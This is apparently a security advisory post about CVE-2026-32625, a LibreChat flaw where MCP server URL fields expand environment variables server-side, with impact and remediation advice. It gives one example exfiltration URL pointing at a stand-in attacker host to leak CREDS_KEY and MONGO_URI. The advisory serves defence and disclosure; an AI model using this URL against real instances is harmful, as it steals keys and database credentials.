al-ice.ai

LibreChat CVE-2026-32625 — MCP URL Env-Var Interpolation Leaks Secrets

Security by al-ice.ai Editorial

AI relevance: LibreChat is a widely deployed multi-provider LLM chat platform and MCP client — when MCP server URL configuration triggers server-side environment-variable interpolation, an authenticated user can harvest all critical secrets from the host process with a single crafted URL.

What happened

  • CVE-2026-32625 (CVSS 9.6, CWE-200) — In LibreChat ≤ 0.8.3, the Zod schema validation pipeline for user-supplied MCP server URL fields resolves ${VAR} placeholders against the server's own process.env before connecting.
  • An attacker with any authenticated account navigates to the MCP server configuration UI and enters a URL such as https://attacker.com/?key=${CREDS_KEY}&mongo=${MONGO_URI}.
  • When LibreChat attempts to connect, the placeholders are expanded server-side and the resolved values (e.g., CREDS_KEY, CREDS_IV, JWT_SECRET, MONGO_URI) are sent as query parameters to the attacker-controlled host.
  • This is distinct from the previously reported CVE-2026-44653 (viewers leaking API keys via API response) — this vector works at the URL interpolation layer and requires no API endpoint abuse.
  • Disclosure: June 2, 2026. Patched in LibreChat 0.8.4-rc1.

Why it matters

  • CVSS 9.6 makes this a near-critical issue for any self-hosted LibreChat instance that accepts user-contributed MCP server configurations.
  • The leaked secrets cover the full cryptographic and persistence stack: encryption keys (CREDS_KEY, CREDS_IV), JWT signing material, and the MongoDB connection string — effectively total instance compromise.
  • This is the second MCP-related credential disclosure in LibreChat within days (following CVE-2026-44653), highlighting that MCP client integrations in multi-user chat platforms have systematic credential-handling gaps.
  • The root cause — environment-variable interpolation on user-controlled input — is a pattern that could affect other MCP client implementations that resolve ${ENV} syntax in configuration fields.

What to do

  • Upgrade LibreChat to 0.8.4-rc1 or newer.
  • If patching is not immediately possible, restrict MCP server configuration to admin-only roles and disable user-contributed server entries.
  • Rotate CREDS_KEY, CREDS_IV, JWT_SECRET, and MONGO_URI on any pre-0.8.4 LibreChat instance with a non-trivial user base.
  • Review any other MCP client or agent platform that interpolates environment variables in user-facing configuration fields — this class of vulnerability is portable.

Sources